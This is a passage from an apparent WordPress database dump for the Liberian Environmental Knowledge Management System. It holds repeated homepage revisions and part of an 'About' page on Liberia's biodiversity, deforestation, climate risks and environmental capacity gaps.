value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 06:26:34','2019-11-14 06:26:34','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2043,1,'2019-11-14 06:39:23','2019-11-14 06:39:23','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 06:39:23','2019-11-14 06:39:23','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2044,1,'2019-11-14 06:41:28','2019-11-14 06:41:28','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 06:41:28','2019-11-14 06:41:28','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2045,1,'2019-11-14 06:41:47','2019-11-14 06:41:47','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 06:41:47','2019-11-14 06:41:47','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2046,1,'2019-11-14 06:43:27','2019-11-14 06:43:27','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the 